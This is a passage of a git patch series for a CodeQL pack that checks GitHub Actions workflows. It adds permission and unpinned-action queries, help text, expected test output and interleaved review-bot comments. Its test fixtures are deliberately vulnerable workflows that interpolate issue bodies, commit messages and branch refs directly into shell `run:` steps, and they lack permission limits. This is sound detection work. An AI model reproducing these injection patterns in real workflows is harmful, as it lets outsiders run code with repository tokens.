.\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENV + + #Closes the issue if the analysis response is "Empty" + - name: Close issue + if: env.analysis_response == 'Empty' + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }} + + #Adds the "needs more info" label if needed + - name: Label and comment issue + if: ((env.analysis_response != 'Valid') && (env.analysis_response != 'Empty') && (github.event.action == 'opened')) + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labels + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments + + #Removes the "needs more info" label if the issue has the missing information + - name: Unlabel updated issue + if: env.analysis_response == 'Valid' && github.event.action == 'edited' + run: | + echo urldecode ${{env.issue_label}} + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g') + + #Adds greetings message + - name: Greetings + if: env.analysis_response == 'Valid' && github.event.action == 'opened' + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/comments + + diff --git a/ql/src/test/.github/workflows/cross2.yml b/ql/src/test/.github/workflows/cross2.yml new file mode 100644 index 000000000000..ae24e21560b4 --- /dev/null +++ b/ql/src/test/.github/workflows/cross2.yml 
@@ -0,0 +1,109 @@ +# issue_type_predicter.yml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/issue_type_predicter.yml#L40-L40) +name: Issue Type Predicter +# This workflow uses https://github.com/DynamoDS/IssuesTypePredicter to predict the type of a github issue + +on: + issues: + types: [opened, edited] + +jobs: + issue_type_Predicter: + name: Issue Type Predicter + runs-on: ubuntu-latest + env: + # The 'analysis_response' variable is used to store the response returned by issue_analyzer.ps1 + # The initial 'undefined' value will be overridden when the script runs + analysis_response: undefined + # The 'parsed_issue_body' variable is used to store the parsed issue body (after removing some sections of the body like Stack Trace) + parsed_issue_body: undefined + # The 'issue_json_string' variable is used to store parsed info of the issue body as a json string + issue_json_string: undefined + # The 'is_wish_list' variable is used to store the value returned by the IssuesTypePredicter project + is_wish_list: undefined + # issue template file name + template: "ISSUE_TEMPLATE.md" + # amount of sections from the template that can be missing information for the issue to still be considered valid + acceptable_missing_info: 1 + + steps: + # Checkout Dynamo repo + - name: Checkout Dynamo Repo + uses: actions/checkout@v4 + + # Removes quotes before using the issue content as a script parameter + - name: Remove Quotes + id: remove_quotes + uses: frabert/replace-string-action@v2.5 + env: + ISSUE_BODY: ${{ github.event.issue.body }} + with: + pattern: "\"" + string: ${{ env.ISSUE_BODY }} + replace-with: '-' + + # Analyze for missing information inside the issue content + - name: Analyze Issue Body + env: + ISSUE_BODY: ${{ steps.remove_quotes.outputs.replaced }} + run: | + echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENV + 
+ # Remove sections in the issue body like "Dynamo version", "Stack Trace" because won't be used to predict the issue type + - name: Clean Issue Body + if: env.analysis_response == 'Valid' + env: + ISSUE_BODY_PARSED: ${{ steps.remove_quotes.outputs.replaced }} + run: | + echo "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENV + + # Create json string from the issue body + - name: Create Issue JSON String + if: env.analysis_response == 'Valid' + env: + ISSUE_NUMBER: ${{ github.event.issue.number }} + ISSUE_TITLE: ${{ github.event.issue.title }} + run: | + echo "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENV + + # Checkout the IssuesTypePredicter repo (https://github.com/DynamoDS/IssuesTypePredicter) + - name: Checkout IssuesTypePredicter Repo + if: env.analysis_response == 'Valid' + uses: actions/checkout@v4 + with: + repository: DynamoDS/IssuesTypePredicter + path: IssuesTypePredicter + + # Setup dotnet + - name: Setup dotnet + uses: actions/setup-dotnet@v4 + with: + dotnet-version: '3.1.0' + + # Build the solution IssuesTypePredicter.sln (this contains two VS2019 ML.NET projects) + - name: Build Issues Type Predicter + if: env.analysis_response == 'Valid' + run: | + dotnet build ./IssuesTypePredicter/IssuesTypePredicter.sln --configuration Release + cp ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/bin/Release/netcoreapp3.1/MLModel.zip . 
+ + # Execute the IssuesTypePredicter program and pass 'issue_json_string' as a parameter + - name: Run Issues Type Predicter + if: env.analysis_response == 'Valid' + run: | + echo "is_wish_list="$(dotnet run -p ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/IssuesTypePredicterML.ConsoleApp.csproj -v q "${{ env.issue_json_string }}")"" >> $GITHUB_ENV + + # If the is_wish_list variable contains 1, label the issue as "Wishlist" + - name: Label issue as 'Wishlist' + if: env.analysis_response == 'Valid' && contains(env.is_wish_list, 'IsWishlist:1') + env: + GH_TOKEN: ${{ secrets.DYNAMO_ISSUES_TOKEN }} + run: | + gh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }} + + # If the issue is missing important information (don't follow the template structure), label the issue as "NotMLEvaluated" + - name: Label issue as 'NotMLEvaluated' + if: env.analysis_response != 'Valid' || env.issue_json_string == '' + env: + GH_TOKEN: ${{ secrets.DYNAMO_ISSUES_TOKEN }} + run: | + gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }} diff --git a/ql/src/test/.github/workflows/cross3.yml b/ql/src/test/.github/workflows/cross3.yml new file mode 100644 index 000000000000..21ee9ca7f61d --- /dev/null +++ b/ql/src/test/.github/workflows/cross3.yml 
@@ -0,0 +1,67 @@
+# cherry-picking.yaml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/disabled/cherry-picking.yaml#L45-L51)
+#DYN-3364
+#This action is disabled for now due to it not behaving as expected
+name: Cherry picking
+on:
+ push:
+ branches:
+ - master
+jobs:
+ cherry_pick:
+ runs-on: ubuntu-latest
+ env:
+ #Variable for the name of the branch to cherry-pick into.
+ #It will remain 'invalid' if no branch is specified
+ destination_branch: 'invalid'
+ #Name of the autogenerated branch to create the PR from
+ auto_branch: 'auto-${{github.event.after}}'
+ #Username for the cherrypick
+ user_name: "Dynamo-Bot"
+ steps:
+ - name: checkout
+ uses: actions/checkout@v3
+
+ #Removes posible conflicting characters on the commit message
+ #This is because the content of the message will be passed to a script as a parameter and quotation marks will split the text as if it where multiple parameters.
+ - name: Remove conflicting chars
+ uses: frabert/replace-string-action@v1.2
+ id: remove_quotations
+ with:
+ pattern: "\""
+ string: ${{github.event.commits[0].message}}
+ replace-with: "-"
+ flags: g
+
+ #Checks the message looking for a cherry-pick request and extracts the target branch name
+ - name: Check Information
+ env:
+ ISSUE_BODY_PARSED: ${{steps.remove_quotations.outputs.replaced}}
+ id: check-info
+ run: |
+ echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV
+
+ #If a target branch was found will run the action
+ - if: env.destination_branch != 'invalid'
+ name: Create PR to branch
+ run: |
+ git config user.name "${{env.user_name}}"
+ git fetch --all
+ git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}}
+ git cherry-pick -x ${{github.event.after}} --strategy-option theirs
+ git push -u origin ${{env.auto_branch}}
+ hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m 
"${{env.pr_message}}"
+ env:
+ #Token used for the pull request. Corresponds to the DynamoBot account
+ GITHUB_TOKEN: ${{secrets.DYNAMOBOTTOKEN}}
+ ISSUE_BODY_PARSED: ${{steps.remove_quotations.outputs.replaced}}
+ #This represents the title and description of the pr in Markdown format
+ #Everything before the first blank line will be the title
+ #Everything after will be included in the description
+ pr_message: |
+ Cherry-Pick from commit: ${{github.event.after}}
+
+ ### Cherry-picking:
+ [Commit](https://github.com/DynamoDS/Dynamo/commit/${{github.event.after}})
+
+ ### Pull request:
+ ${{ env.ISSUE_BODY_PARSED }}
From fe976faf6ace6067fb39368a0bdedb92473a3e0e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 27 Feb 2024 15:20:35 +0100
Subject: [PATCH 075/707] feat(queries): Migrate queries from AdvancedSecurity repo
---
 ql/lib/codeql/actions/Ast.qll | 10 +++-- .../dataflow/internal/DataFlowPrivate.qll | 4 +- ql/src/Security/CWE-094/UntrustedCheckout.md | 0 ql/src/Security/CWE-094/UntrustedCheckout.ql | 1 + .../CWE-275/MissingActionsPermissions.md | 22 ++++++++++ .../CWE-275/MissingActionsPermissions.ql | 23 ++++++++++ ql/src/Security/CWE-829/UnpinnedActionsTag.md | 44 +++++++++++++++++++ ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 38 ++++++++++++++++ ql/src/test/.github/workflows/cross1.yml | 1 + ql/src/test/.github/workflows/cross2.yml | 1 + ql/src/test/.github/workflows/cross3.yml | 1 + 11 files changed, 139 insertions(+), 6 deletions(-) create mode 100644 ql/src/Security/CWE-094/UntrustedCheckout.md create mode 100644 ql/src/Security/CWE-275/MissingActionsPermissions.md create mode 100644 ql/src/Security/CWE-275/MissingActionsPermissions.ql create mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.md create mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.ql
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index fd66acf530d8..2a506f2100c1 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll @@ -54,8 +54,6 @@ class CompositeActionStmt extends Statement instanceof Actions::CompositeAction InputsStmt getInputsStmt() { result = this.(YamlMapping).lookup("inputs") } OutputsStmt getOutputsStmt() { result = this.(YamlMapping).lookup("outputs") } - - string getName() { result = this.getLocation().getFile().getRelativePath() } } class RunsStmt extends Statement instanceof Actions::Runs { @@ -68,6 +66,8 @@ class RunsStmt extends Statement instanceof Actions::Runs { * A Github Actions Workflow */ class WorkflowStmt extends Statement instanceof Actions::Workflow { + string getName() { result = super.getName() } + JobStmt getAJobStmt() { result = super.getJob(_) } JobStmt getJobStmt(string id) { result = super.getJob(id) } @@ -79,6 +79,8 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { string getATriggerEvent() { exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) } + + Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -91,8 +93,6 @@ class ReusableWorkflowStmt extends WorkflowStmt { InputsStmt getInputsStmt() { result = workflow_call.(YamlMapping).lookup("inputs") } OutputsStmt getOutputsStmt() { result = workflow_call.(YamlMapping).lookup("outputs") } - - string getName() { result = this.getLocation().getFile().getRelativePath() } } class InputsStmt extends Statement instanceof YamlMapping { @@ -189,6 +189,8 @@ class JobStmt extends Statement instanceof Actions::Job { } IfStmt getIfStmt() { result = super.getIf() } + + Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index de88c39c2d53..43239e29485d 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
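Review bot: Adding `getName()` to `WorkflowStmt` (second hunk) silently changes what `ReusableWorkflowStmt.getName()` returns, because the subclass override that returned the file's relative path is removed in the fourth hunk and the inherited member now reads the YAML `name:` key via `super.getName()`, which has no result when the key is absent; the new member has no QLDoc recording this, and `/** Gets the value of the workflow's top-level `name` key, if present. */` would make the change visible to callers. The two `getPermissionsStmt()` members added in the third and fifth hunks are identical `lookup("permissions")` calls returning a bare `Statement`, also without QLDoc; `/** Gets the `permissions` mapping declared at this level, if any. */` on each would at least state the contract until a dedicated class exists. The companion change to `DataFlowPrivate.qll` in this commit falls back to the relative path explicitly, which suggests the rename was intentional rather than accidental.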
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -83,10 +83,10 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflowStmt - then result = this.(ReusableWorkflowStmt).getName() + then result = this.(ReusableWorkflowStmt).getLocation().getFile().getRelativePath() else if this instanceof CompositeActionStmt - then result = this.(CompositeActionStmt).getName() + then result = this.(CompositeActionStmt).getLocation().getFile().getRelativePath() else none() } } diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.md b/ql/src/Security/CWE-094/UntrustedCheckout.md new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql index 9c9b5f9eb26a..bb6c0d9a029f 100644 --- a/ql/src/Security/CWE-094/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql @@ -6,6 +6,7 @@ * @kind problem * @problem.severity warning * @precision low + * @security-severity 9.3 * @id actions/untrusted-checkout * @tags actions * security diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.md b/ql/src/Security/CWE-275/MissingActionsPermissions.md new file mode 100644 index 000000000000..5c0e433c5cb5 --- /dev/null +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.md 
@@ -0,0 +1,22 @@
+# Actions Job and Workflow Permissions are not set
+
+A GitHub Actions job or workflow hasn't set permissions to restrict privileges to the workflow job.
+A workflow job by default without the `permissions` key or a root workflow `permissions` will run with all the permissions which can be given to a workflow.
+
+## Recommendation
+
+Add the `permissions` key to the job or workflow (applied to all jobs) and set the permissions to the least privilege required to complete the task:
+
+```yaml
+name: "My workflow"
+permissions:
+ contents: read
+ pull-requests: write
+
+# or
+jobs:
+ my-job:
+ permissions:
+ contents: read
+ pull-requests: write
+```
diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql
new file mode 100644
index 000000000000..a4cecf18b789
--- /dev/null
+++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql
@@ -0,0 +1,23 @@
+/**
+ * @name Workflow does not contain permissions
+ * @description Workflows should contain permissions to provide a clear understanding has permissions to run the workflow.
+ * @kind problem
+ * @security-severity 5.0
+ * @problem.severity warning
+ * @precision high
+ * @id actions/missing-workflow-permissions
+ * @tags actions
+ * maintainability
+ * external/cwe/cwe-275
+ */
+
+import actions
+
+from WorkflowStmt workflow, JobStmt job
+where
+ job = workflow.getAJobStmt() and
+ (
+ not exists(workflow.getPermissionsStmt()) and
+ not exists(job.getPermissionsStmt())
+ )
+select job, "Actions Job or Workflow does not set permissions"
diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md
new file mode 100644
index 000000000000..855773e6a31b
--- /dev/null
+++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.md
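Review bot: The `@description` in the QLDoc header of MissingActionsPermissions.ql is ungrammatical ("to provide a clear understanding has permissions to run the workflow"), and `@tags` omits `security` although the query carries `@security-severity` and lives under `Security/CWE-275`, unlike UnpinnedActionsTag.ql in the same commit which tags `security`. I would change the header to `* @description Workflows should declare the permissions their jobs need so the token's privileges are explicit and minimal.` and add `* security` under `@tags`. Note also that the `where` clause only tests that a `permissions` key exists at either level, so a workflow-level `permissions: write-all` satisfies it; a presence check is a reasonable scope, but the description or the .md should say that is all the query verifies.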
@@ -0,0 +1,44 @@
+# Unpinned tag for 3rd party Action in workflow
+
+The individual jobs in a GitHub Actions workflow can interact with (and compromise) other jobs. For example, a job querying the environment variables used by a later job, writing files to a shared directory that a later job processes, or even more directly by interacting with the Docker socket and inspecting other running containers and executing commands in them. This means that a compromise of a single action within a workflow can be very significant, as that compromised action would have access to all secrets configured on your repository, and may be able to use the `GITHUB_TOKEN` to write to the repository. Consequently, there is significant risk in sourcing actions from third-party repositories on GitHub. For information on some of the steps an attacker could take, see "Security hardening for GitHub Actions."
+
+## Recommendation
+
+Pin an action to a full length commit SHA. This is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork.
+
+## Example
+
+In this example, the Actions workflow uses an unpinned version.
+
+```yaml
+name: "Unpinned Action Example"
+
+jobs:
+ build:
+ steps:
+ - name: Checkout repository
+ uses: actions-third-party-mirror/checkout@v3
+
+ - run: |
+ ./build.sh
+```
+
+The Action is pinned in the example below. 
+ +```yaml +name: "Pinned Action Example" + +jobs: + build: + steps: + - name: Checkout repository + uses: actions-mirror-third-party/checkout@ac593985615ec2ede58e132d2e21d2b1cbd6127c + + - run: | + ./build.sh +``` + +## References + +- GitHub: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions) +- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html). diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql new file mode 100644 index 000000000000..12bc06481bed --- /dev/null +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -0,0 +1,38 @@ +/** + * @name Unpinned tag for 3rd party Action in workflow + * @description Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. + * @kind problem + * @security-severity 5.0 + * @problem.severity warning + * @precision high + * @id actions/unpinned-tag + * @tags security + * actions + * external/cwe/cwe-829 + */ + +import actions + +bindingset[version] +private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f0-9]{40}$") } + +bindingset[repo] +private predicate isTrustedOrg(string repo) { + exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) +} + +from StepUsesExpr uses, string repo, string version, WorkflowStmt workflow, string name +where + uses.getCallee() = repo and + uses.getVersion() = version and + uses.getEnclosingWorkflowStmt() = workflow and + ( + workflow.getName() = name + or + not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name + ) and + not isPinnedCommit(version) and + not isTrustedOrg(repo) +select uses, + "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + + "', not a pinned commit hash", uses, uses.toString() 
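Review bot: `isTrustedOrg` compares the `uses:` owner case-sensitively (`repo.matches(org + "/%")`), while GitHub resolves owner and repository names case-insensitively as far as I know, so `Actions/checkout@v4` would be reported as an untrusted unpinned action purely because of casing; `repo.toLowerCase().matches(org + "/%")` would make the allowlist match what the runner actually resolves. The alert message also presents the workflow's `name` as the "Unpinned 3rd party Action", which reads as though the workflow itself were the action; `"Workflow '" + name + "' step $@ uses unpinned 3rd party Action '" + repo + "' with ref '" + version + "'"` would read correctly. Neither helper predicate has QLDoc; `/** Holds if `version` is a full 40-hex-digit commit SHA. */` and `/** Holds if `repo` belongs to an organisation whose actions are exempt from pinning. */` would suffice.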
diff --git a/ql/src/test/.github/workflows/cross1.yml b/ql/src/test/.github/workflows/cross1.yml index 9927aca8c563..946497250e6f 100644 --- a/ql/src/test/.github/workflows/cross1.yml +++ b/ql/src/test/.github/workflows/cross1.yml @@ -3,6 +3,7 @@ name: Issue Workflow on: issues: types: [opened,edited] +permissions: {} jobs: #This job will check the issue to determine if it should be moved to a different repository redirectIssue: diff --git a/ql/src/test/.github/workflows/cross2.yml b/ql/src/test/.github/workflows/cross2.yml index ae24e21560b4..ef8269151d73 100644 --- a/ql/src/test/.github/workflows/cross2.yml +++ b/ql/src/test/.github/workflows/cross2.yml @@ -2,6 +2,7 @@ name: Issue Type Predicter # This workflow uses https://github.com/DynamoDS/IssuesTypePredicter to predict the type of a github issue +permissions: {} on: issues: types: [opened, edited] diff --git a/ql/src/test/.github/workflows/cross3.yml b/ql/src/test/.github/workflows/cross3.yml index 21ee9ca7f61d..ddb98c670c75 100644 --- a/ql/src/test/.github/workflows/cross3.yml +++ b/ql/src/test/.github/workflows/cross3.yml @@ -6,6 +6,7 @@ on: push: branches: - master +permissions: {} jobs: cherry_pick: runs-on: ubuntu-latest From 8e7e5d03a5b4ae096c9f6ad5a8c52684fc214681 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 28 Feb 2024 11:15:38 +0100 Subject: [PATCH 076/707] fix(test): Add expected files --- build-dbs.sh | 5 - ql/lib/test/test.expected | 378 +++++++++++++++++++++++++++++++++++ ql/src/test/partial.expected | 28 +++ ql/src/test/test.expected | 152 ++++++++++++++ 4 files changed, 558 insertions(+), 5 deletions(-) delete mode 100755 build-dbs.sh create mode 100644 ql/lib/test/test.expected create mode 100644 ql/src/test/partial.expected create mode 100644 ql/src/test/test.expected diff --git a/build-dbs.sh b/build-dbs.sh deleted file mode 100755 index 073fcc40b441..000000000000 --- a/build-dbs.sh +++ /dev/null 
@@ -1,5 +0,0 @@ -#!/bin/bash -rm -rf ql/src/test/test.testproj || true -rm -rf ql/lib/test/test.testproj || true -codeql database create ql/src/test/test.testproj -l yaml -s ql/src/test -codeql database create ql/lib/test/test.testproj -l yaml -s ql/lib/test diff --git a/ql/lib/test/test.expected b/ql/lib/test/test.expected new file mode 100644 index 000000000000..4007e6454ea4 --- /dev/null +++ b/ql/lib/test/test.expected 
@@ -0,0 +1,378 @@ +files +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +yamlNodes +| .github/workflows/test.yml:1:1:1:2 | on | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:3:1:3:4 | jobs | +| .github/workflows/test.yml:4:3:4:6 | job1 | +| .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:5:5:11 | runs-on | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | +| .github/workflows/test.yml:7:5:7:11 | outputs | +| .github/workflows/test.yml:8:7:8:16 | job_output | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:10:5:10:9 | steps | +| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:11:9:11:12 | uses | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | +| .github/workflows/test.yml:12:9:12:12 | with | +| .github/workflows/test.yml:13:11:13:21 | fetch-depth | +| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | +| .github/workflows/test.yml:13:24:13:24 | 0 | +| .github/workflows/test.yml:15:9:15:12 | name | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | +| .github/workflows/test.yml:16:9:16:10 | id | +| .github/workflows/test.yml:16:13:16:18 | source | +| .github/workflows/test.yml:17:9:17:12 | uses | +| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | +| .github/workflows/test.yml:19:9:19:12 | name | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:19:15:19:43 | Remove ... 
d files | +| .github/workflows/test.yml:20:9:20:10 | id | +| .github/workflows/test.yml:20:13:20:16 | step | +| .github/workflows/test.yml:21:9:21:12 | uses | +| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | +| .github/workflows/test.yml:22:9:22:12 | with | +| .github/workflows/test.yml:23:11:23:16 | source | +| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:24:11:24:14 | find | +| .github/workflows/test.yml:24:17:24:21 | "foo" | +| .github/workflows/test.yml:25:11:25:17 | replace | +| .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:27:9:27:11 | run | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:29:9:29:11 | run | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:31:3:31:6 | job2 | +| .github/workflows/test.yml:32:5:32:11 | runs-on | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... 
-latest | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | +| .github/workflows/test.yml:34:5:34:6 | if | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:5:36:9 | needs | +| .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:38:5:38:9 | steps | +| .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:40:9:40:11 | run | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +jobNodes +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +stepNodes +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +allUsesNodes +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +stepUsesNodes +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +jobUsesNodes +usesSteps +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | fetch-depth | .github/workflows/test.yml:13:24:13:24 | 0 | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | find | .github/workflows/test.yml:24:17:24:21 | "foo" | +| .github/workflows/test.yml:19:9:26:6 | name: R ... 
d files | replace | .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +runSteps1 +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | id: sink | echo ${{needs.job1.outputs.job_output}} | +runSteps2 +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +runStepChildren +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... 
